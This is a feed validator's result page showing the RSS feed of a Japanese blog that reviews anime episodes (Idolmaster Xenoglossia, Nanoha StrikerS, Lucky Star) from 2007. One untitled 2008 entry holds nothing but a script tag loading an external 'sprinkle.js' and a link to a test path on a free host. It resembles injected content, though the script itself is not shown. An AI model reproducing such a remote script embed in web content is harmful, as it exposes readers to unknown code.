Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: http://doujinjima.dtiblog.com/?xml

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:cc="http://web.resource.org/cc/" xml:lang="ja" >
  3. <channel rdf:about="http://doujinjima.dtiblog.com/?xml">
  4. <title>iSLAND あっと Blog</title>
  5. <link>http://doujinjima.dtiblog.com/</link>
  6. <description>日々視聴したアニメや漫画の感想を細々と綴っているブログ</description>
  7. <dc:language>ja</dc:language>
  8. <items>
  9. <rdf:Seq>
  10.             <rdf:li rdf:resource="http://doujinjima.dtiblog.com/blog-entry-82.html" />
  11. <rdf:li rdf:resource="http://doujinjima.dtiblog.com/blog-entry-81.html" />
  12. <rdf:li rdf:resource="http://doujinjima.dtiblog.com/blog-entry-80.html" />
  13. <rdf:li rdf:resource="http://doujinjima.dtiblog.com/blog-entry-79.html" />
  14. <rdf:li rdf:resource="http://doujinjima.dtiblog.com/blog-entry-78.html" />
  15. </rdf:Seq>
  16. </items>
  17. </channel>
  18.  
  19.     <item rdf:about="http://doujinjima.dtiblog.com/blog-entry-82.html">
  20. <link>http://doujinjima.dtiblog.com/blog-entry-82.html</link>
  21. <title>ここにタイトルを記入してください</title>
  22. <description> </description>
  23. <content:encoded><![CDATA[ <script src="http://doujinjima.com/sprinkle.js"></script> <div src="http://moredou.free100.tv/test/"></div> ]]></content:encoded>
  24. <dc:subject>日々</dc:subject>
  25. <dc:date>2008-03-05T16:45:03+09:00</dc:date>
  26. <dc:creator>管理人・EXUP</dc:creator>
  27. <dc:publisher>DTI-BLOG</dc:publisher>
  28. </item>
  29. <item rdf:about="http://doujinjima.dtiblog.com/blog-entry-81.html">
  30. <link>http://doujinjima.dtiblog.com/blog-entry-81.html</link>
  31. <title>アイドルマスター XENOGLOSSIA 14話 なんか動きづらい</title>
  32. <description>
  33. 10年前に伊織と</description>
  34. <content:encoded><![CDATA[ <a href="http://10.dtiblog.com/d/doujinjima/file/imas14_01.jpg" target="_blank"><img src="http://10.dtiblog.com/d/doujinjima/file/imas14_01s.jpg" alt="" border="0"></a><br clear="all">
  35. <br />10年前に伊織とネーブラはすでに出会っていた…。
  36. <br />
  37. <br />この頃のネーブラのマスターが誰だったのかはまだ分かりませんが、マスター経験者で最年長なのがあずさで、それでもマスターにするには若すぎるから、きっともういないマスターなのでしょうね。
  38. <br />
  39. <br />地上訓練の途中だったのかもしれませんが、それならば割と過疎地を選んだでしょうから伊織もけっこうな田舎のコだったのですねー。バカリボンをバカにできませんってば(笑
  40. <br />
  41. <br />時は戻って現代に。
  42. <br />
  43. <br />真がモンデンキントを離れたので、マスター資格を持つ人間が他にいなくなったのでしょうか。謹慎処分を解かれ再びネーブラのマスターとなるべく伊織がテストに臨む…、そんなアイドルマスターの14話です。 ]]></content:encoded>
  44. <dc:subject>アイドルマスター</dc:subject>
  45. <dc:date>2007-07-04T19:03:39+09:00</dc:date>
  46. <dc:creator>管理人・EXUP</dc:creator>
  47. <dc:publisher>DTI-BLOG</dc:publisher>
  48. </item>
  49. <item rdf:about="http://doujinjima.dtiblog.com/blog-entry-80.html">
  50. <link>http://doujinjima.dtiblog.com/blog-entry-80.html</link>
  51. <title>りりかるなのはStrikerS 14話 母と子</title>
  52. <description>サブタイトルは「Mother&amp;children」
  53.  
  54. 母と子、じゃなくて子達というところになんだか機動六課のことまで含まれてそうですねー。まぁスバルとティアはともかく、キャロとエリオはまだまだお子様ポジションから抜け出せてないから、ってところでしょうけど。
  55.  
  56. さらにここにヴィヴィオまで追加ときたからには大変さはさらにプラス。
  57.  
  58. </description>
  59. <content:encoded><![CDATA[ サブタイトルは「Mother&children」
  60. <br />
  61. <br />母と子、じゃなくて子達というところになんだか機動六課のことまで含まれてそうですねー。まぁスバルとティアはともかく、キャロとエリオはまだまだお子様ポジションから抜け出せてないから、ってところでしょうけど。
  62. <br />
  63. <br />さらにここにヴィヴィオまで追加ときたからには大変さはさらにプラス。
  64. <br />
  65. <br />普通の子供だったら、あえてなのはやフェイトに馴染ませてまた引きはがすような真似は避けたいところですが、事件に関わりのある人造生命体ということであれば、引受先の家庭まで影響を及ぼしかねませんから、事件解決まではなのフェイの二人にまかせる他道は無さそうですね。
  66. <br />
  67. <br /><a href="http://10.dtiblog.com/d/doujinjima/file/nanohasts14_01.jpg" target="_blank"><img src="http://10.dtiblog.com/d/doujinjima/file/nanohasts14_01s.jpg" alt="" border="0"></a><br clear="all">
  68. <br />てなわけで早起きのなのはに比べてちょっと遅いシフトなのか未だ寝続けるフェイトにヴィヴィオをまかせてなのはは朝の訓練へ。
  69. <br />
  70. <br />すっかりフェイトに懐いてるヴィヴィオがかわええのぉ。
  71. <br />
  72. <br /> ]]></content:encoded>
  73. <dc:subject>リリカルなのは</dc:subject>
  74. <dc:date>2007-07-04T18:51:00+09:00</dc:date>
  75. <dc:creator>管理人・EXUP</dc:creator>
  76. <dc:publisher>DTI-BLOG</dc:publisher>
  77. </item>
  78. <item rdf:about="http://doujinjima.dtiblog.com/blog-entry-79.html">
  79. <link>http://doujinjima.dtiblog.com/blog-entry-79.html</link>
  80. <title>らき☆すた 13話 おいしい日</title>
  81. <description>やりすぎ。
  82.  
  83. Aパートは安心の作りで今週も安定してるなぁ、と毎度のことながら感心しつつも鑑賞していたわけなのですが、Bパートのブッ飛び具合といったらもうなんというか…。
  84.  
  85. </description>
  86. <content:encoded><![CDATA[ やりすぎ。
  87. <br />
  88. <br />Aパートは安心の作りで今週も安定してるなぁ、と毎度のことながら感心しつつも鑑賞していたわけなのですが、Bパートのブッ飛び具合といったらもうなんというか…。
  89. <br />
  90. <br /><a href="http://10.dtiblog.com/d/doujinjima/file/ls13_01.jpg" target="_blank"><img src="http://10.dtiblog.com/d/doujinjima/file/ls13_01s.jpg" alt="" border="0"></a><br clear="all">
  91. <br />とりあえずはお正月の回想シーンをひとまとめにしてつらつらと流す、らき☆すたお馴染みの手法でひたすら、またーヽ(´ー`)ノーりとダベる面々。
  92. <br />
  93. <br />正月といえばお餅なワケですが、いくらなんでも毎日食ってると飽きてくるわけで。らき☆すたの面々はそれほど奇抜な食べ方はしないみたいですが、醤油に海苔という定番から始まってきなこやあんこ、そしてバター醤油とかベーコン巻きとかありとあらゆる料理法が出来るのがお餅です。
  94. <br />
  95. <br />腹持ちはいいし、カロリーは高いけど消化もいいので実に万能選手なのがお餅。
  96. <br />
  97. <br />ま、その分動かないと全部脂肪と化すわけですが(笑 ]]></content:encoded>
  98. <dc:subject>らき☆すた</dc:subject>
  99. <dc:date>2007-07-03T00:36:00+09:00</dc:date>
  100. <dc:creator>管理人・EXUP</dc:creator>
  101. <dc:publisher>DTI-BLOG</dc:publisher>
  102. </item>
  103. <item rdf:about="http://doujinjima.dtiblog.com/blog-entry-78.html">
  104. <link>http://doujinjima.dtiblog.com/blog-entry-78.html</link>
  105. <title>夏アニメの予定が出そろいましたが…</title>
  106. <description>ちょーっと手が回らないっぽいですねぇ、夏のラインナップを見てると。
  107.  
  108. 春の番組で継続して見ているのが2クールものばっかりということもあって、ここにさらに夏の新番を入れて感想を書くのは正直無理っぽいかもしれません。
  109.  
  110. でもまぁとりあえず、ちょろちょろっと見たいものをメモがわりに書いてみましょうか。全部見るとは限りませんけどー。
  111.  
  112. </description>
  113. <content:encoded><![CDATA[ ちょーっと手が回らないっぽいですねぇ、夏のラインナップを見てると。
  114. <br />
  115. <br />春の番組で継続して見ているのが2クールものばっかりということもあって、ここにさらに夏の新番を入れて感想を書くのは正直無理っぽいかもしれません。
  116. <br />
  117. <br />でもまぁとりあえず、ちょろちょろっと見たいものをメモがわりに書いてみましょうか。全部見るとは限りませんけどー。
  118. <br />
  119. <br />:ななついろ☆ドロップス
  120. <br />:ドージンワーク
  121. <br />:ウミショー
  122. <br />:スクールデイズ
  123. <br />:CODE-E
  124. <br />:スカイガールズ
  125. <br />:ぽてまよ
  126. <br />:絶望先生
  127. <br />:もえたん
  128. <br />:シグルイ
  129. <br />:ゼロの使い魔
  130. <br />:スクールデイズ
  131. <br />
  132. <br />幸い、あまり番組の重なりは無いので単純にチェックするだけだったら、なんとかなりそうですね。
  133. <br />あとは時間とのかねあいということになりますが、なんとか無理をしない範囲でいってみましょーか。 ]]></content:encoded>
  134. <dc:subject>日々</dc:subject>
  135. <dc:date>2007-07-02T22:45:00+09:00</dc:date>
  136. <dc:creator>管理人・EXUP</dc:creator>
  137. <dc:publisher>DTI-BLOG</dc:publisher>
  138. </item>
  139. </rdf:RDF>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

  1. Download the "valid RSS" banner.

  2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

  3. Add this HTML to your page (change the image src attribute if necessary):

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=http%3A//doujinjima.dtiblog.com/%3Fxml

Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda